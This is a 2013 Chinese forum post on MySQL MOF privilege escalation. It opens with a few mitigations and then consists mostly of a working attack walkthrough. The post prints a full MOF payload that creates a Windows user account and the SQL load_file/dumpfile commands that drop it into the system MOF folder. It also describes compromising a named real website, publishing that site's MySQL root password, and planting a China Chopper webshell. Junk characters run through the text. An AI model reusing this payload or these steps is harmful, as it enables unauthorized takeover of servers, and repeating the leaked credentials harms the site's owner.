Mysql mof扩展漏洞防范方法; V# v" j0 `/ \3 x$ Q
! u) \1 }: h+ V7 c# Z8 l
网上公开的一些利用代码:# ~: ?/ S m- N! Y
o/ J! v* N2 J
#pragma namespace(“\\\\.\\root\\subscription”)( G. i, g4 D; E# f( K/ \
" \5 D$ u p& P& ~5 X$ l% ?instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
! V5 U- } t' d$ k8 ]9 r8 q6 M( |4 L- ?1 ~1 b: B" B, r; e
- s1 c) e7 Y9 b8 v) L3 N- i0 ~
! v' ~% w) n8 _
3 }( |$ O& M. j% Q% B8 w
- T: n9 o* P1 p# F: B3 x9 W连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;; W4 y+ h7 n" W. ]
从上面代码来看得出解决办法:
& n$ i/ L8 L- Z% s/ x
+ N! c0 I, `# Y4 W1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数6 N& j0 W5 N9 E) N' v& k! q8 u; {
1 w& R6 v+ J- h
2、禁止使用”WScript.Shel”组件
; _: p, T2 `! J# @ B: N+ `0 V
1 T7 X5 u8 D! `8 m3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER# b& W* g1 T2 M! K3 o
i8 v0 M! h8 g, Y$ V当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
0 C+ X) p1 ]" W8 v9 D5 I ^7 l' L7 z' O/ ^+ K0 ~
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权! M l Q% H/ P1 |
- d2 T; U3 H9 C* D- L但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容1 {6 I/ t0 Z) ]; @3 w3 z+ F h! ^
# k* d( W1 C7 Z! l& N3 k看懂了后就开始练手吧
9 |( t3 H4 k9 u' e) Z. ~
0 Z% [7 `! l+ }" @http://www.webbmw.com/config/config_ucenter.php 一句话 a
0 ]' a3 a r- L+ H2 b
8 V; \- v& M) G8 g$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。, n! V$ l8 Y1 @7 q6 _- o
$ A8 x* H; T( Q5 h, u于是直接用菜刀开搞) e1 t; P; e6 t; _; m" U$ ]8 s
V0 H" w" Z) S5 b; [上马先
' E" Z0 i' J, N' I# }% H" z/ [9 j1 k+ }6 F
既然有了那些账号 之类的 于是我们就执行吧…….# l! ^- r5 w! X0 F
( c4 C. _1 w4 n& q1 y4 s& h0 E% ~小小的说下
" T! w! L+ D3 y7 H" v5 h- d* y+ G7 Y
在这里第1次执行未成功 原因未知/ t% {- r1 Q* d F( d9 @
. f2 y- w" ^: H* t0 {, x我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。3 r) s. \+ x. V2 Z3 l
1 R# V3 F& y3 U( E- D
#pragma namespace(“\\\\.\\root\\subscription”)
% \, i( S5 V% U# e' V) j/ o! O' o$ q$ B( l% B% L
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
1 p' G) e0 A5 O7 c- V
9 b0 _, v' j: o' I/ H我是将文件放到C:\WINDOWS\temp\1.mof y+ _1 U2 ?$ l1 t5 y5 J
! s3 O5 {, p: K2 D
所以我们就改下执行的代码
( F3 i4 n' i+ Q
9 d& ]) g0 [+ W) T. u8 a2 ^5 Qselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;. r! T4 s7 }( P* |
9 H, z- r) t# D4 q |! x6 x
- [. |7 ^$ b- I$ A( t8 j0 o9 i/ v8 c) Y- \+ ^9 @$ ~
但是 你会发现账号还是没有躺在那里。。# E* j% f8 c$ h" ~. @
' E3 z5 e3 r* r- R$ r6 q
于是我就感觉蛋疼
8 Y: g ]+ {2 N3 a' j6 j
y- _+ f. |5 U1 | p就去一个一个去执行 但是执行到第2个 mysql时就成功了………+ A* g$ h8 r6 U1 C6 P# p' o8 ~# `; x$ u) t
( y5 W# v: P: `/ Y% L2 t1 {+ `# X
) R3 d8 i0 _2 i! }7 x7 Q, t/ I: V# m" p; U5 y D4 I
但是其他库均不成功…
' x' K* b5 `1 U9 V! ?
, Z; H) G! Q4 n1 F2 m我就很费解呀 到底为什么不成功求大牛解答…# {/ ~+ X* _8 f$ t
4 m( ^ M- V( b0 }# d
6 y8 w- u) ]& H# f; J3 G& k
: P! U. R/ |+ i% U4 i
|
发表于 2013-1-4 19:49:49
收藏
支持
反对